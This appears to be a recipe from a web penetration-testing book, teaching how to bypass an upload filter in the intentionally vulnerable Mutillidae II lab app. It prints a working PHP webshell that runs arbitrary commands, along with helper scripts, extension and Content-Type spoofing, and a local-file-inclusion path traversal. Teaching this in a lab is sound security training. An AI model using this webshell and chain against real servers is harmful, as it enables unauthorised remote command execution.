For this recipe, we need Mutillidae II in our vulnerable VM to be at security level, use the Toggle Security option in the menu to set it, and use Burp Suite as proxy:

1. In Mutillidae II's menu, go to Others | Unrestricted File Upload | File Upload.
2. The first test will be to attempt uploading a PHP webshell. You can use the ones we used in previous chapters or make a new one. As follows, the upload will fail and we will receive a detailed description of why it failed:

From the preceding response, we can infer that the files are uploaded to /tmp in the server, first using a randomly generated name, then file extension and type are checked, and if they are allowed, the file is renamed to its original name. So, in order to upload and execute a PHP file (a webshell) in this server, we need to change its extension and the Content-Type header in the request.

3. Let's first try and upload a script that will tell us what the working directory (or document root) of the web server is, so that we know where to copy our webshell to once it is uploaded. Create a file sf-info.php containing the following code:

<?
system('pwd');
system('ls');
?>

4. Upload it by intercepting the upload request and changing the extension to .jpg in the filename parameter and the Content-Type to image/jpeg, as follows:

5. Now, go to BurpSuite's Proxy History and send any GET request to Mutillidae to repeater. We will use this to execute our recently uploaded file by exploiting a Local File Inclusion vulnerability.

6. In Repeater, replace the value of the page parameter in the URL by ../../../../tmp/sf-info.jpg and send the request. The result, as displayed in the following screenshot, will tell us the working directory for the web server and the content of such a directory:

7. Now, let's create the webshell code and put the following code in a file named webshell.php:

<?
system($_GET['cmd']);
echo '<p>Type a command: <form method="GET"><input type="text" name="cmd"></form></p>';
?>

8. Upload the file, changing its extension and type as follows:

The question now is how to execute commands through the webshell. We cannot call it directly, as it is stored in /tmp and that is not directly accessible from the browser; we may be able to use the file inclusion vulnerability, but, as the webshell's code will be integrated with that of the including script (index.php), we depend on this script not doing any filtering or modification to the parameters provided. To work around that difficulties, we will upload another file to the server that renames the webshell to .php and moves it to the web root.

9. Send to repeater the request where we uploaded sf-info.php.
10. Change the filename to rename.jpg and adjust the Content-Type.

11. Replace the file's content with the following content:

<?
system('cp /tmp/webshell.jpg /owaspbwa/mutillidae-git/webshell.php');
system('ls');
?>

12. The following screenshot is how it should look:

13. As we did with sf-info.jpg, execute rename.jpg by exploiting LFI, as demonstrated in the following screenshot:

14. Now, our webshell should be in the application's root directory. Navigate to http://192.168.56.11/mutillidae/webshell.php. The following screenshot shows system commands being executed through it: